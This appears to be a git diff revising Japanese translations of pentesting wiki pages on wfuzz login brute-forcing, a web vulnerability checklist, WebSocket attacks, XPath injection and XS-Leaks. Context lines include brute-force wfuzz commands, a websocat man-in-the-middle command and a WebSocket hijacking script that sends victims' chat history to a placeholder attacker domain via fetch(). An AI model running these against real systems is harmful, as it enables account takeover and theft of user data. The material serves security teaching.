 wfuzz -c -w users.txt --hs "Login name" -d "name=FUZZ&password=FUZZ&autologin=1&enter=Sign+in" http://zipper.htb/zabbix/index.php
 #Here we have filtered by line
@@ -62,9 +62,9 @@ wfuzz.py -c -z file,users.txt -z file,pass.txt --sc 200 -d "name=FUZZ&password=F
 ```bash
 wfuzz -c -w users.txt -w pass.txt --ss "Welcome " -p 127.0.0.1:8080:HTTP -b "PHPSESSIONID=1234567890abcdef;customcookie=hey" "http://example.com/index.php?username=FUZZ&password=FUZ2Z&action=sign+in"
 ```
-### ブルートフォースディレクトリ/RESTfulブルートフォース
+### ブルートフォース ディレクトリ/RESTful ブルートフォース
 
-[Arjunパラメータワードリスト](https://raw.githubusercontent.com/s0md3v/Arjun/master/arjun/db/params.txt)
+[Arjun パラメータ ワードリスト](https://raw.githubusercontent.com/s0md3v/Arjun/master/arjun/db/params.txt)
 ```
 wfuzz -c -w /tmp/tmp/params.txt --hc 404 https://domain.com/api/FUZZ
 ```
@@ -82,7 +82,7 @@ wfuzz -c -w users.txt -w pass.txt -p 127.0.0.1:8080:HTTP --ss "Welcome" --basic
 ```bash
 wfuzz -c -w users.txt -w pass.txt -p 127.0.0.1:8080:HTTP --ss "Welcome" --ntlm 'domain\FUZZ:FUZ2Z' "http://example.com/index.php"
 ```
-### クッキー/ヘッダー ブルートフォース (vhost ブルート)
+### クッキー/ヘッダーのブルートフォース (vhostブルート)
 
 #### **クッキー、フィルターコード (表示)、プロキシ**
 ```bash
diff --git a/src/pentesting-web/web-vulnerabilities-methodology.md b/src/pentesting-web/web-vulnerabilities-methodology.md
index 4ec817222..712dcff05 100644
--- a/src/pentesting-web/web-vulnerabilities-methodology.md
+++ b/src/pentesting-web/web-vulnerabilities-methodology.md
@@ -22,7 +22,7 @@
 
 > [!NOTE]
 > ほとんどのwebアプリケーションは、**ユーザーが後で処理されるデータを入力することを許可します。**\
-> データの構造によっては、サーバーが期待する脆弱性が適用される場合とされない場合があります。
+> データの構造によって、サーバーが期待する脆弱性が適用される場合とされない場合があります。
 
 ### **Reflected Values**
 
@@ -44,7 +44,7 @@
 - [ ] [**XSSI**](xssi-cross-site-script-inclusion.md)
 - [ ] [**XS-Search**](xs-search/)
 
-言及された脆弱性のいくつかは特別な条件を必要とし、他のものは単に内容が反映されることを必要とします。脆弱性を迅速にテストするための興味深いポリグロットを見つけることができます：
+いくつかの脆弱性は特別な条件を必要とし、他のものは単にコンテンツが反映されることを必要とします。脆弱性を迅速にテストするための興味深いポリグロットを見つけることができます：
 
 {{#ref}}
 pocs-and-polygloths-cheatsheet/
@@ -52,7 +52,7 @@ pocs-and-polygloths-cheatsheet/
 
 ### **Search functionalities**
 
-機能がバックエンド内のデータを検索するために使用される場合、任意のデータを検索するために（悪用）できるかもしれません。
+バックエンド内のデータを検索するために機能が使用される場合、任意のデータを検索するために（悪用）できるかもしれません。
 
 - [ ] [**File Inclusion/Path Traversal**](file-inclusion/)
 - [ ] [**NoSQL Injection**](nosql-injection.md)
@@ -71,7 +71,7 @@ WebSocketがメッセージを投稿したり、ユーザーがアクション
 
 ### **HTTP Headers**
 
-Webサーバーから提供されるHTTPヘッダーによっては、いくつかの脆弱性が存在する可能性があります。
+Webサーバーから提供されるHTTPヘッダーによって、いくつかの脆弱性が存在する可能性があります。
 
 - [ ] [**Clickjacking**](clickjacking.md)
 - [ ] [**Content Security Policy bypass**](content-security-policy-csp-bypass/)
@@ -93,8 +93,8 @@ Webサーバーから提供されるHTTPヘッダーによっては、いくつ
 
 ### **Structured objects / Specific functionalities**
 
-一部の機能は、**データが非常に特定の形式で構造化されることを必要とします**（言語シリアライズオブジェクトやXMLのように）。したがって、その種のデータを処理する必要があるため、アプリケーションが脆弱であるかどうかを特定しやすくなります。\
-一部の**特定の機能**も、**特定の形式の入力が使用される場合**に脆弱である可能性があります（メールヘッダーインジェクションのように）。
+いくつかの機能は、**データが非常に特定の形式で構造化されることを必要とします**（言語シリアライズオブジェクトやXMLのように）。したがって、その種のデータを処理する必要があるため、アプリケーションが脆弱であるかどうかを特定しやすくなります。\
+いくつかの**特定の機能**も、**特定の形式の入力が使用される場合**に脆弱である可能性があります（メールヘッダーインジェクションのように）。
 
 - [ ] [**Deserialization**](deserialization/)
 - [ ] [**Email Header Injection**](email-injections.md)
@@ -105,7 +105,7 @@ Webサーバーから提供されるHTTPヘッダーによっては、いくつ
 
 ファイルのアップロードを許可する機能は、いくつかの問題に対して脆弱である可能性があります。\
 ユーザー入力を含むファイルを生成する機能は、予期しないコードを実行する可能性があります。\
-ユーザーがアップロードしたファイルやユーザー入力を含む自動生成されたファイルを開くと、危険にさらされる可能性があります。
+ユーザーがアップロードしたファイルや、ユーザー入力を含む自動生成されたファイルを開くと、危険にさらされる可能性があります。
 
 - [ ] [**File Upload**](file-upload/)
 - [ ] [**Formula Injection**](formula-csv-doc-latex-ghostscript-injection.md)
diff --git a/src/pentesting-web/web-vulnerabilities-methodology/README.md b/src/pentesting-web/web-vulnerabilities-methodology/README.md
index 38f44e0f4..03dd7b6ca 100644
--- a/src/pentesting-web/web-vulnerabilities-methodology/README.md
+++ b/src/pentesting-web/web-vulnerabilities-methodology/README.md
@@ -7,7 +7,7 @@
 ## Proxies
 
 > [!NOTE]
-> 現在、**web** **applications**は通常、何らかの**中間** **プロキシ**を使用しており、これらは脆弱性を悪用するために（悪用されることがあります）。これらの脆弱性には、脆弱なプロキシが必要ですが、通常はバックエンドに追加の脆弱性も必要です。
+> 現在、**web** **applications**は通常、何らかの**中間** **プロキシ**を使用しており、これらは脆弱性を悪用するために（悪用される可能性があります）。これらの脆弱性には、脆弱なプロキシが必要ですが、通常はバックエンドに追加の脆弱性も必要です。
 
 - [ ] [**Abusing hop-by-hop headers**](../abusing-hop-by-hop-headers.md)
 - [ ] [**Cache Poisoning/Cache Deception**](../cache-deception.md)
@@ -44,7 +44,7 @@
 - [ ] [**XSSI**](../xssi-cross-site-script-inclusion.md)
 - [ ] [**XS-Search**](../xs-search.md)
 
-いくつかの脆弱性は特別な条件を必要とし、他のものは単にコンテンツが反映されることを必要とします。脆弱性を迅速にテストするための興味深いポリグロットを見つけることができます：
+言及された脆弱性のいくつかは特別な条件を必要とし、他のものは単に内容が反映されることを必要とします。脆弱性を迅速にテストするための興味深いポリグロスを見つけることができます：
 
 {{#ref}}
 ../pocs-and-polygloths-cheatsheet/
@@ -52,7 +52,7 @@
 
 ### **Search functionalities**
 
-バックエンド内のデータを検索するために機能が使用される場合、任意のデータを検索するために（悪用）できるかもしれません。
+機能がバックエンド内のデータを検索するために使用される場合、任意のデータを検索するために（悪用）できるかもしれません。
 
 - [ ] [**File Inclusion/Path Traversal**](../file-inclusion/)
 - [ ] [**NoSQL Injection**](../nosql-injection.md)
@@ -93,8 +93,8 @@ Webサーバーから提供されるHTTPヘッダーによっては、いくつ
 
 ### **Structured objects / Specific functionalities**
 
-いくつかの機能は、**データが非常に特定の形式で構造化されることを必要とします**（言語シリアライズされたオブジェクトやXMLのように）。したがって、その種のデータを処理する必要があるため、アプリケーションが脆弱であるかどうかを特定しやすくなります。\
-特定の機能も、**特定の形式の入力が使用される場合**に脆弱である可能性があります（Email Header Injectionsのように）。
+一部の機能は、**データが非常に特定の形式で構造化されることを必要とします**（言語シリアライズオブジェクトやXMLのように）。したがって、その種のデータを処理する必要があるため、アプリケーションが脆弱であるかどうかを特定しやすくなります。\
+一部の**特定の機能**も、**特定の形式の入力が使用される場合**に脆弱である可能性があります（Email Header Injectionsのように）。
 
 - [ ] [**Deserialization**](../deserialization/)
 - [ ] [**Email Header Injection**](../email-injections.md)
@@ -105,7 +105,7 @@ Webサーバーから提供されるHTTPヘッダーによっては、いくつ
 
 ファイルのアップロードを許可する機能は、いくつかの問題に対して脆弱である可能性があります。\
 ユーザー入力を含むファイルを生成する機能は、予期しないコードを実行する可能性があります。\
-ユーザーがアップロードしたファイルやユーザー入力を含む自動生成されたファイルを開くと、危険にさらされる可能性があります。
+ユーザーがユーザーによってアップロードされたファイルや、ユーザー入力を含む自動生成されたファイルを開くと、危険にさらされる可能性があります。
 
 - [ ] [**File Upload**](../file-upload/)
 - [ ] [**Formula Injection**](../formula-csv-doc-latex-ghostscript-injection.md)
diff --git a/src/pentesting-web/websocket-attacks.md b/src/pentesting-web/websocket-attacks.md
index 92ac30e66..4dd9fba69 100644
--- a/src/pentesting-web/websocket-attacks.md
+++ b/src/pentesting-web/websocket-attacks.md
@@ -8,7 +8,7 @@ WebSocket接続は、最初の**HTTP**ハンドシェイクを通じて確立さ
 
 ### WebSocket接続の確立
 
-WebSocket接続の確立に関する詳細な説明は[**こちら**](https://infosecwriteups.com/cross-site-websocket-hijacking-cswsh-ce2a6b0747fc)からアクセスできます。要約すると、WebSocket接続は通常、以下に示すようにクライアント側のJavaScriptを介して開始されます：
+WebSocket接続の確立に関する詳細な説明は[**こちら**](https://infosecwriteups.com/cross-site-websocket-hijacking-cswsh-ce2a6b0747fc)でアクセスできます。要約すると、WebSocket接続は通常、以下に示すようにクライアント側のJavaScriptを介して開始されます：
 ```javascript
 var ws = new WebSocket("wss://normal-website.com/ws")
 ```
@@ -38,7 +38,7 @@ Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
 **WebSocketハンドシェイクの重要なポイント:**
 
 - `Connection`および`Upgrade`ヘッダーはWebSocketハンドシェイクの開始を示します。
-- `Sec-WebSocket-Version`ヘッダーは、通常`13`の希望するWebSocketプロトコルバージョンを示します。
+- `Sec-WebSocket-Version`ヘッダーは、希望するWebSocketプロトコルバージョンを示し、通常は`13`です。
 - Base64エンコードされたランダム値が`Sec-WebSocket-Key`ヘッダーに送信され、各ハンドシェイクがユニークであることを保証し、キャッシングプロキシによる問題を防ぎます。この値は認証のためではなく、応答が誤って構成されたサーバーやキャッシュによって生成されていないことを確認するためのものです。
 - サーバーの応答における`Sec-WebSocket-Accept`ヘッダーは`Sec-WebSocket-Key`のハッシュであり、WebSocket接続を開くサーバーの意図を確認します。
 
@@ -50,14 +50,14 @@ Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
 ```bash
 websocat --insecure wss://10.10.10.10:8000 -v
 ```
-または、websocatサーバーを作成するには：
+ウェブソケットサーバーを作成するには:
 ```bash
 websocat -s 0.0.0.0:8000 #Listen in port 8000
 ```
 ### MitM websocket connections
 
 もしクライアントが現在のローカルネットワークから**HTTP websocket**に接続していることがわかった場合、[ARP Spoofing Attack](../generic-methodologies-and-resources/pentesting-network/#arp-spoofing)を試みて、クライアントとサーバーの間でMitM攻撃を実行することができます。\
-クライアントが接続しようとしているときに、次のように使用できます:
+クライアントが接続しようとしたら、次に使用できます:
 ```bash
 websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
 ```
@@ -88,7 +88,7 @@ websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
 
 **websocket**接続を**確立**する際に、**クッキー**が**サーバー**に**送信**されることに注意してください。**サーバー**は、送信されたクッキーに基づいて各**特定の** **ユーザー**をその**websocket** **セッション**に**関連付ける**ためにそれを使用している可能性があります。
 
-次に、例えば**websocket** **サーバー**がユーザーの**会話の履歴**を返す場合、"**READY"**というメッセージが送信されると、**シンプルなXSS**が接続を確立し（**クッキー**は被害者ユーザーを認証するために**自動的に送信**されます）、"**READY**"を送信することで**会話の履歴**を**取得**できるようになります。
+次に、例えば**websocket** **サーバー**がユーザーの**会話の履歴**を**返送**する場合、"**READY"**というメッセージが送信されると、**単純なXSS**が接続を確立し（**クッキー**は被害者ユーザーを認証するために**自動的に送信**されます）、"**READY**"を送信することで**会話の履歴**を**取得**できるようになります。
 ```markup
 <script>
 websocket = new WebSocket('wss://your-websocket-URL')
@@ -109,7 +109,7 @@ fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
 
 ### ユーザーからデータを盗む
 
-なりすましたいウェブアプリケーションをコピーし（例えば .html ファイル）、Websocket通信が行われているスクリプト内にこのコードを追加します:
+なりすましたいウェブアプリケーションをコピーし（例えば .html ファイル）、ウェブソケット通信が行われているスクリプト内にこのコードを追加します:
 ```javascript
 //This is the script tag to load the websocket hooker
 ;<script src="wsHook.js"></script>
@@ -136,15 +136,15 @@ sudo python3 -m http.server 80
 ```
 ## レースコンディション
 
-WebSocketsにおけるレースコンディションも存在します。[この情報を確認して、詳細を学んでください](race-condition.md#rc-in-websockets)。
+WebSocketにおけるレースコンディションも存在します。[この情報を確認して、詳細を学んでください](race-condition.md#rc-in-websockets)。
 
 ## その他の脆弱性
 
-Web Socketsは**サーバー側とクライアント側にデータを送信するメカニズム**であり、サーバーとクライアントが情報をどのように処理するかによって、**Web SocketsはXSS、SQLi、またはWebの一般的な脆弱性を利用するために、WebSocketからのユーザーの入力を使用して、他のいくつかの脆弱性を悪用するために使用される可能性があります。**
+WebSocketは**サーバー側とクライアント側にデータを送信するメカニズム**であり、サーバーとクライアントが情報をどのように処理するかによって、**WebSocketはXSS、SQLi、またはWebSocketからのユーザー入力を使用した他の一般的なWeb脆弱性を悪用するために使用される可能性があります。**
 
 ## **WebSocketスモグリング**
 
-この脆弱性により、**逆プロキシの制限を回避する**ことができ、**WebSocket通信が確立された**と信じ込ませることができます（たとえそれが真実でなくても）。これにより、攻撃者は**隠れたエンドポイントにアクセスする**ことができる可能性があります。詳細については、以下のページを確認してください：
+この脆弱性により、**逆プロキシの制限を回避する**ことができ、**WebSocket通信が確立された**と信じ込ませることができます（たとえそれが真実でなくても）。これにより、攻撃者は**隠されたエンドポイントにアクセスする**ことができる可能性があります。詳細については、以下のページを確認してください：
 
 {{#ref}}
 h2c-smuggling.md
diff --git a/src/pentesting-web/xpath-injection.md b/src/pentesting-web/xpath-injection.md
index e36b2d9af..facfcf8af 100644
--- a/src/pentesting-web/xpath-injection.md
+++ b/src/pentesting-web/xpath-injection.md
@@ -32,10 +32,10 @@ XPath（XML Path Language）クエリをユーザー入力に基づいて形成
 
 プレディケートは選択を絞り込むために使用されます：
 
-- **/bookstore/book\[1]**: bookstore要素の最初のbook要素の子が選択されます。IEバージョン5から9のための回避策として、最初のノードを\[0]としてインデックス付けするために、SelectionLanguageをJavaScriptを通じてXPathに設定します。
-- **/bookstore/book\[last()]**: bookstore要素の最後のbook要素の子が選択されます。
-- **/bookstore/book\[last()-1]**: bookstore要素の次最後のbook要素の子が選択されます。
-- **/bookstore/book\[position()<3]**: bookstore要素の最初の2つのbook要素の子が選択されます。
+- **/bookstore/book\[1]**: bookstore要素の最初のbook要素が選択されます。IEバージョン5から9のための回避策として、最初のノードを\[0]としてインデックス付けするために、SelectionLanguageをJavaScriptを通じてXPathに設定します。
+- **/bookstore/book\[last()]**: bookstore要素の最後のbook要素が選択されます。
+- **/bookstore/book\[last()-1]**: bookstore要素の前のbook要素が選択されます。
+- **/bookstore/book\[position()<3]**: bookstore要素の最初の2つのbook要素が選択されます。
 - **//title\[@lang]**: lang属性を持つすべてのtitle要素が選択されます。
 - **//title\[@lang='en']**: "lang"属性の値が"en"であるすべてのtitle要素が選択されます。
 - **/bookstore/book\[price>35.00]**: 価格が35.00を超えるbookstoreのすべてのbook要素が選択されます。
diff --git a/src/pentesting-web/xs-search.md b/src/pentesting-web/xs-search.md
index 0a5f79117..491459e31 100644
--- a/src/pentesting-web/xs-search.md
+++ b/src/pentesting-web/xs-search.md
@@ -9,7 +9,7 @@ XS-Searchは、**サイドチャネル脆弱性**を利用して**クロスオ
 この攻撃に関与する主要なコンポーネントは以下の通りです：
 
 - **脆弱なウェブ**: 情報を抽出することを目的としたターゲットウェブサイト。
-- **攻撃者のウェブ**: 攻撃者が作成した悪意のあるウェブサイトで、被害者が訪問し、エクスプロイトをホストしています。
+- **攻撃者のウェブ**: 攻撃者が作成した悪意のあるウェブサイトで、被害者が訪れ、エクスプロイトをホストしています。
 - **インクルージョンメソッド**: 脆弱なウェブを攻撃者のウェブに組み込むために使用される技術（例：window.open、iframe、fetch、hrefを持つHTMLタグなど）。
 - **リーク技術**: インクルージョンメソッドを通じて収集された情報に基づいて、脆弱なウェブの状態の違いを識別するために使用される技術。
 - **状態**: 攻撃者が区別しようとする脆弱なウェブの2つの潜在的な条件。
@@ -37,7 +37,7 @@ XS-Searchは、**サイドチャネル脆弱性**を利用して**クロスオ
 
 - **イベントハンドラー**: XS-Leaksにおける古典的なリーク技術で、**onload**や**onerror**のようなイベントハンドラーがリソースの読み込みの成功または失敗に関する洞察を提供します。
 - **エラーメッセージ**: JavaScriptの例外や特別なエラーページは、エラーメッセージから直接リーク情報を提供したり、その存在と不在を区別したりすることができます。
-- **グローバル制限**: メモリ容量や他の強制されたブラウザ制限など、ブラウザの物理的制限は、しきい値が達成されたときに信号を送ることができ、リーク技術として機能します。
+- **グローバル制限**: メモリ容量や他の強制されたブラウザ制限など、ブラウザの物理的制限は、しきい値に達したときに信号を送ることができ、リーク技術として機能します。
 - **グローバル状態**: ブラウザの**グローバル状態**（例：履歴インターフェース）との検出可能な相互作用を悪用できます。たとえば、ブラウザの履歴内の**エントリの数**は、クロスオリジンページに関する手がかりを提供できます。
 - **パフォーマンスAPI**: このAPIは、**現在のページのパフォーマンス詳細**を提供し、ドキュメントと読み込まれたリソースのネットワークタイミングを含み、要求されたリソースに関する推測を可能にします。
 - **読み取り可能な属性**: 一部のHTML属性は**クロスオリジンで読み取り可能**であり、リーク技術として使用できます。たとえば、`window.frame.length`プロパティは、JavaScriptがクロスオリジンのウェブページに含まれるフレームの数をカウントすることを可能にします。
@@ -49,11 +49,11 @@ XSinatorは、いくつかの既知のXS-Leaksに対してブラウザを**チ
 ツールには[**https://xsinator.com/**](https://xsinator.com/)で**アクセスできます**。
 
 > [!WARNING]
-> **除外されたXS-Leaks**: サービスワーカーに依存するXS-Leaksは、XSinator内の他のリークに干渉するため、除外する必要がありました。さらに、特定のウェブアプリケーションの誤設定やバグに依存するXS-Leaksも**除外することにしました**。たとえば、CrossOrigin Resource Sharing (CORS)の誤設定、postMessageリーク、またはCross-Site Scriptingです。さらに、時間ベースのXS-Leaksは、遅く、ノイズが多く、不正確であることが多いため、除外しました。
+> **除外されたXS-Leaks**: 他のリークに干渉するため、**サービスワーカー**に依存するXS-Leaksを除外する必要がありました。さらに、特定のウェブアプリケーションの誤設定やバグに依存するXS-Leaksも**除外することにしました**。たとえば、CrossOrigin Resource Sharing (CORS)の誤設定、postMessageリーク、またはCross-Site Scriptingです。さらに、遅く、騒がしく、不正確であることが多いため、時間ベースのXS-Leaksも除外しました。
 
 ## **タイミングベースの技術**
 
-以下の技術のいくつかは、ウェブページの可能な状態の違いを検出するプロセスの一部としてタイミングを使用します。ウェブブラウザで時間を測定する方法はいくつかあります。
+以下のいくつかの技術は、ウェブページの可能な状態の違いを検出するプロセスの一部としてタイミングを使用します。ウェブブラウザで時間を測定する方法はいくつかあります。
 
 **時計**: [performance.now()](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now) APIは、開発者が高解像度のタイミング測定を取得することを可能にします。\
 攻撃者が暗黙の時計を作成するために悪用できるAPIは多数あります：[Broadcast Channel API](https://developer.mozilla.org/en-US/docs/Web/API/Broadcast_Channel_API)、[Message Channel API](https://developer.mozilla.org/en-US/docs/Web/API/MessageChannel)、[requestAnimationFrame](https://developer.mozilla.org/en-US/docs/Web/API/window/requestAnimationFrame)、[setTimeout](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/setTimeout)、CSSアニメーションなど。\
@@ -73,7 +73,7 @@ XSinatorは、いくつかの既知のXS-Leaksに対してブラウザを**チ
 xs-search/cookie-bomb-+-onerror-xs-leak.md
 {{#endref}}
 
-コード例は、**JSからスクリプトオブジェクトを読み込もうとしますが、他のタグ**（オブジェクト、スタイルシート、画像、オーディオなど）も使用できます。さらに、**タグを直接**挿入し、タグ内に`onload`および`onerror`イベントを宣言することも可能です（JSから挿入するのではなく）。
+コード例は、**JSからスクリプトオブジェクトを読み込もうとしますが、他のタグ**（オブジェクト、スタイルシート、画像、オーディオなど）も使用できます。さらに、**タグを直接**挿入し、タグ内で`onload`および`onerror`イベントを宣言することも可能です（JSから挿入するのではなく）。
 
 この攻撃には、スクリプトなしのバージョンもあります：
 ```html
@@ -89,7 +89,7 @@ xs-search/cookie-bomb-+-onerror-xs-leak.md
 - **Detectable Difference**: Timing (一般的にページコンテンツ、ステータスコードによる)
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events)
 - **Summary:** [**performance.now()**](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) **API** は、リクエストを実行するのにかかる時間を測定するために使用できます。ただし、他の時計も使用できます。たとえば、[**PerformanceLongTaskTiming API**](https://developer.mozilla.org/en-US/docs/Web/API/PerformanceLongTaskTiming) は、50msを超えるタスクを特定できます。
-- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events) 別の例は次の通りです：
+- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events) 別の例は次のとおりです：
 
 {{#ref}}
 xs-search/performance.now-example.md
@@ -97,7 +97,7 @@ xs-search/performance.now-example.md
 
 #### Onload Timing + Forced Heavy Task
 
-この技術は前のものと似ていますが、**attacker** は **正の応答または負の応答** の際に **関連する時間** をかけるように **強制** し、その時間を測定します。
+この技術は前のものと同じですが、**attacker** は **正のまたは負の応答** の際に **関連する時間** をかけるように **強制** するアクションも行い、その時間を測定します。
 
 {{#ref}}
 xs-search/performance.now-+-force-heavy-task.md
@@ -134,9 +134,9 @@ xs-search/performance.now-+-force-heavy-task.md
 - **Summary**: 正しいコンテンツにアクセスしたときにページがエラーを出し、任意のコンテンツにアクセスしたときに正しく読み込まれるようにできる場合、時間を測定することなくすべての情報を抽出するためのループを作成できます。
 - **Code Example**:
 
-あなたが**iframe内に**秘密のコンテンツを持つ**ページ**を**挿入**できると仮定します。
+あなたが**iframe内に**秘密のコンテンツを持つ**ページを挿入**できると仮定します。
 
-あなたは**被害者に**"_**flag**_"を含むファイルを**iframe**を使って検索させることができます（例えば、CSRFを悪用する）。iframe内では、_**onloadイベント**_が**常に少なくとも一度は実行される**ことがわかっています。次に、**URL**の**iframe**を変更できますが、URL内の**ハッシュ**の**コンテンツ**のみを変更します。
+あなたは**被害者に**"_**flag**_"を含むファイルを**iframeを使用して検索**させることができます（例えば、CSRFを悪用）。iframe内では、_**onloadイベント**_が**常に少なくとも一度は実行される**ことがわかっています。次に、**URL**の**iframe**を変更できますが、URL内の**ハッシュ**の**コンテンツ**のみを変更します。
 
 例えば：
 
@@ -145,14 +145,14 @@ xs-search/performance.now-+-force-heavy-task.md
 
 最初のURLが**正常に読み込まれた**場合、**URLのハッシュ**部分を**変更**すると、**onload**イベントは**再度トリガーされません**。しかし、ページが**読み込み時に何らかのエラー**を持っていた場合、**onload**イベントは**再度トリガーされます**。
 
-したがって、**正しく**読み込まれたページと、アクセス時に**エラー**が発生したページを**区別**できます。
+これにより、**正しく**読み込まれたページと、アクセス時に**エラー**が発生したページを**区別**できます。
 
 ### Javascript Execution
 
 - **Inclusion Methods**: フレーム
 - **Detectable Difference**: ページコンテンツ
 - **More info**:
-- **Summary:** ページが**機密**コンテンツを**返す**場合、**または**ユーザーによって**制御**可能な**コンテンツ**を返す場合。ユーザーは**無効な場合に有効なJSコードを設定**し、各試行を**`<script>`**タグ内で**読み込む**ことができます。無効な場合、攻撃者の**コード**が**実行され**、有効な場合は**何も**実行されません。
+- **Summary:** ページが**機密**コンテンツを**返す**場合、**または**ユーザーによって**制御**可能な**コンテンツ**を返す場合。ユーザーは**負のケース**で**有効なJSコードを設定**し、各試行を**`<script>`**タグ内で**読み込む**ことができます。したがって、**負の**ケースでは攻撃者の**コード**が**実行され**、**肯定的**なケースでは**何も**実行されません。
 - **Code Example:**
 
 {{#ref}}
@@ -174,10 +174,10 @@ xs-search/javascript-execution-xs-leak.md
 - **Inclusion Methods**: フレーム
 - **Detectable Difference**: ページコンテンツ
 - **More info**: [https://xsleaks.dev/docs/attacks/id-attribute/](https://xsleaks.dev/docs/attacks/id-attribute/), [https://xsleaks.dev/docs/attacks/experiments/portals/](https://xsleaks.dev/docs/attacks/experiments/portals/)
-- **Summary**: idまたはname属性から機密データを漏洩させる。
+- **Summary**: idまたはname属性から機密データを漏洩します。
 - **Code Example**: [https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet](https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet)
 
-**iframe**内に**ページを読み込む**ことができ、**`#id_value`**を使用して、指定されたifのiframe内の要素に**フォーカス**を当てることができます。次に、**`onblur`**信号がトリガーされると、ID要素が存在します。\
+**iframe内にページを読み込み**、**`#id_value`**を使用してページが指定された要素に**フォーカス**するようにできます。次に、**`onblur`**信号がトリガーされると、ID要素が存在します。\
 同様の攻撃を**`portal`**タグで実行できます。
 
 ### postMessage Broadcasts <a href="#postmessage-broadcasts" id="postmessage-broadcasts"></a>
@@ -188,7 +188,7 @@ xs-search/javascript-execution-xs-leak.md
 - **Summary**: postMessageから機密情報を収集するか、postMessagesの存在をオラクルとして使用してページ内のユーザーのステータスを知る
 - **Code Example**: `すべてのpostMessagesをリッスンする任意のコード。`
 
-アプリケーションは、異なるオリジン間で通信するために頻繁に[`postMessage`ブロードキャスト](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage)を利用します。しかし、この方法は、`targetOrigin`パラメータが適切に指定されていない場合、**機密情報**を不注意に露出させる可能性があります。さらに、メッセージを受信する行為自体が**オラクル**として機能する可能性があります。たとえば、特定のメッセージは、ログインしているユーザーにのみ送信される場合があります。したがって、これらのメッセージの存在または不在は、ユーザーの状態やアイデンティティに関する情報を明らかにすることができます。
+アプリケーションは、異なるオリジン間で通信するために頻繁に[`postMessage`ブロードキャスト](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage)を利用します。しかし、この方法は、`targetOrigin`パラメータが適切に指定されていない場合、**機密情報**を不注意に露出させる可能性があります。さらに、メッセージを受信する行為自体が**オラクル**として機能する可能性があります。たとえば、特定のメッセージは、ログインしているユーザーにのみ送信される場合があります。したがって、これらのメッセージの存在または不在は、ユーザーの状態やアイデンティティに関する情報を明らかにする可能性があります。
 
 ## Global Limits Techniques
 
@@ -200,7 +200,7 @@ xs-search/javascript-execution-xs-leak.md
 - **Summary**: WebSocket接続制限を使い果たすことで、クロスオリジンページのWebSocket接続数が漏洩します。
 - **Code Example**: [https://xsinator.com/testing.html#WebSocket%20Leak%20(FF)](<https://xsinator.com/testing.html#WebSocket%20Leak%20(FF)>), [https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)](<https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)>)
 
-ターゲットページが使用している**WebSocket接続**の数を特定することが可能です。これにより、攻撃者はアプリケーションの状態を検出し、WebSocket接続数に関連する情報を漏洩させることができます。
+ターゲットページが使用している**WebSocket接続の数**を特定することが可能です。これにより、攻撃者はアプリケーションの状態を検出し、WebSocket接続の数に関連する情報を漏洩させることができます。
 
 ある**オリジン**が**最大数のWebSocket**接続オブジェクトを使用している場合、接続状態に関係なく、新しいオブジェクトの作成は**JavaScript例外**を引き起こします。この攻撃を実行するために、攻撃者のウェブサイトはターゲットウェブサイトをポップアップまたはiframeで開き、ターゲットウェブが読み込まれた後、可能な限り最大数のWebSocket接続を作成しようとします。**スローされた例外の数**は、ターゲットウェブサイトが使用している**WebSocket接続の数**です。
 
@@ -214,7 +214,7 @@ xs-search/javascript-execution-xs-leak.md
 
 このXS-Leakは、攻撃者が**クロスオリジンページが支払いリクエストを開始したとき**を検出できるようにします。
 
-**支払いリクエスト**APIを使用しているターゲットウェブサイトがある場合、同時にアクティブにできるのは**1つのリクエスト**だけです。したがって、このAPIを使用しようとするさらなる試みは失敗し、**JavaScript例外**を引き起こします。攻撃者は、**定期的にPayment API UIを表示しようとする**ことでこれを悪用できます。1回の試行で例外が発生した場合、ターゲットウェブサイトは現在それを使用しています。攻撃者は、作成後すぐにUIを閉じることで、これらの定期的な試行を隠すことができます。
+**同時にアクティブにできる支払いリクエストは1つだけ**であるため、ターゲットウェブサイトがPayment Request APIを使用している場合、このAPIを使用しようとする**さらなる試みは失敗**し、**JavaScript例外**を引き起こします。攻撃者は、**定期的にPayment API UIを表示しようとする**ことでこれを悪用できます。1回の試行で例外が発生した場合、ターゲットウェブサイトは現在それを使用しています。攻撃者は、作成後すぐにUIを閉じることで、これらの定期的な試行を隠すことができます。
 
 ### Timing the Event Loop <a href="#timing-the-event-loop" id="timing-the-event-loop"></a>
 
@@ -228,23 +228,23 @@ xs-search/javascript-execution-xs-leak.md
 xs-search/event-loop-blocking-+-lazy-images.md
 {{#endref}}
 
-JavaScriptは[シングルスレッドのイベントループ](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop)の並行モデルで動作し、**一度に1つのタスクしか実行できません**。この特性は、**異なるオリジンからのコードが実行されるのにかかる時間を測定するために悪用できます**。攻撃者は、固定プロパティを持つイベントを継続的にディスパッチすることで、イベントループ内で自分のコードの実行時間を測定できます。これらのイベントは、イベントプールが空のときに処理されます。他のオリジンも同じプールにイベントをディスパッチしている場合、**攻撃者は自分のタスクの実行の遅延を観察することで、これらの外部イベントが実行されるのにかかる時間を推測できます**。遅延を監視するこの方法は、異なるオリジンからのコードの実行時間を明らかにし、機密情報を露出させる可能性があります。
